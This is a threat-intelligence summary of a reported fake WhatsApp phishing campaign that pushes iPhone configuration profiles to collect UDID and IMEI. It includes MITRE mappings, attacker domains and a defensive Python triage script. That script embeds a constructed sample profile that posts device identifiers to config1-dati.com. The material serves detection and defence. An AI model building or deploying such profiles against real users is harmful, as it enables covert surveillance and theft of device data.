A Spyware Vendor Seemingly Made a Fake WhatsApp to Hack Targets

Researchers traced a fake WhatsApp phishing operation aimed at iPhone users, linked to an Italian surveillance company. The attack uses iPhone configuration profiles via a phishing site to push spyware and potentially exfiltrate device data. #WhatsApp #Cy4Gate #Epeius #config5-dati #config1-dati #MDM #iPhone #UDID #IMEI

Keypoints

  • The operation targeted iPhone users with a phishing page designed to impersonate WhatsApp, aiming to prompt the installation of a configuration profile.
  • The phishing domain cluster includes config5-dati.com and related domains (config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com), with shared infrastructure and certificates linking them.
  • The page instructs users how to install a configuration profile via iPhone settings, rather than through the App Store.
  • The configuration file reportedly collects device identifiers such as UDID and IMEI and sends them to a server controlled by the attacker.
  • Researchers connected the activity to Cy4Gate, an Italian surveillance vendor whose products include Epeius, a lawful-intercept solution.
  • WhatsApp and other researchers noted the broader risk of spyware vendors abusing legitimate app ecosystems to target individuals.

MITRE Techniques

  • [T1566.002] Spearphishing Link – The phishing page impersonates an official WhatsApp site, using WhatsApp branding and professional graphics to lay out the installation process step-by-step, and instructs visitors how to install a configuration file via the iPhone’s system settings menu. [The phishing page is designed to look like an official WhatsApp site, with WhatsApp branding and professional graphics laying out the installation process step-by-step.]
  • [T1204] User Execution – The page asks users to press the ‘download’ button and follow the on-page instructions, steps that would trigger installation of the configuration profile. [To keep in touch with your friends press the ‘download’ button and follow the instructions on the page.]
  • [T1036] Masquerading – The phishing page masquerades as a legitimate WhatsApp site to entice users into installing a profile. [The phishing page is designed to look like an official WhatsApp site, with WhatsApp branding and professional graphics laying out the installation process step-by-step.]
  • [T1583] Acquire Infrastructure – Domain clustering and shared certificates connect multiple domains (config5-dati.com, config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com) used to host and support the phishing operation. [config5-dati[.]com domain shared an encryption certificate with other similarly named domains, revealing others such as config4-dati[.]com, config3-dati[.]com, and config6-dati[.]com.]
  • [T1005] Data from Local System – The configuration file collects device identifiers (UDID and IMEI) and sends them to the attacker’s server. [the file sends information to the config1-dati server, including the UDID, or Unique Device Identifier assigned to each iOS device by Apple; and the IMEI or International Mobile Equipment Identity, another unique code that identifies cellphones.]
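The behaviour described above (a profile that collects the UDID and IMEI and posts them to a server) matches Apple's over-the-air "Profile Service" enrollment payload, which declares a destination URL and the DeviceAttributes the device should send. The Python triage script below is an added example, not code from the article or from any party it names: it parses a constructed profile in that format and flags any Profile Service payload that requests sensitive identifiers or posts to the reported configX-dati.com cluster. The article does not say which payload type the real profile used, so that mapping, the sample profile, and its identifier and URL path are assumptions.

```python
import plistlib
from urllib.parse import urlparse

# Domain cluster reported in the article (config1..config6-dati.com).
REPORTED_DOMAINS = tuple(f"config{i}-dati.com" for i in range(1, 7))

# Attributes a Profile Service payload may request; UDID and IMEI are the two
# the article says the fake WhatsApp profile collected.
SENSITIVE_ATTRIBUTES = {"UDID", "IMEI", "ICCID", "MEID", "SERIAL"}

# Constructed sample modelled on Apple's OTA enrollment profile format. The
# identifier and URL path are invented; only the host comes from the article.
SAMPLE_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>PayloadType</key><string>Profile Service</string>
  <key>PayloadIdentifier</key><string>com.example.fake-whatsapp</string>
  <key>PayloadDisplayName</key><string>WhatsApp</string>
  <key>PayloadContent</key><dict>
    <key>URL</key><string>https://config1-dati.com/enroll</string>
    <key>DeviceAttributes</key><array>
      <string>UDID</string><string>IMEI</string><string>VERSION</string>
    </array>
  </dict>
</dict></plist>"""

def _in_reported_cluster(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in REPORTED_DOMAINS)

def triage_profile(mobileconfig: bytes) -> list:
    """One finding per Profile Service payload: destination host, sensitive
    device attributes requested, and whether the host is reported infrastructure."""
    profile = plistlib.loads(mobileconfig)
    # Enrollment profiles carry the payload at top level; ordinary profiles
    # carry a PayloadContent array of payload dicts. Handle both shapes.
    payloads = [profile] if profile.get("PayloadType") == "Profile Service" else [
        p for p in profile.get("PayloadContent", []) if isinstance(p, dict)]
    findings = []
    for p in payloads:
        if p.get("PayloadType") != "Profile Service":
            continue
        content = p.get("PayloadContent", {})
        host = (urlparse(content.get("URL", "")).hostname or "").lower()
        attrs = set(content.get("DeviceAttributes", []))
        findings.append({
            "identifier": p.get("PayloadIdentifier", "<none>"),
            "host": host,
            "sensitive_attributes": sorted(attrs & SENSITIVE_ATTRIBUTES),
            "reported_infrastructure": _in_reported_cluster(host),
        })
    return findings

if __name__ == "__main__":
    for finding in triage_profile(SAMPLE_PROFILE):
        print(finding)
```

A profile whose Profile Service URL points outside the organisation's own MDM host, or that requests hardware identifiers at all, is worth blocking or escalating before installation.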

Indicators of Compromise

  • [Domain] context – config5-dati.com, config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com, check3.it (and 2 more domains)
  • [Certificate / Crypto] context – encryption certificate shared across configX-dati domains indicating linked infrastructure
  • [Device Identifier] context – UDID, IMEI – data reportedly exfiltrated by the configuration profile

Read more: https://www.vice.com/en/article/akdqwa/a-spyware-vendor-seemingly-made-a-fake-whatsapp-to-hack-targets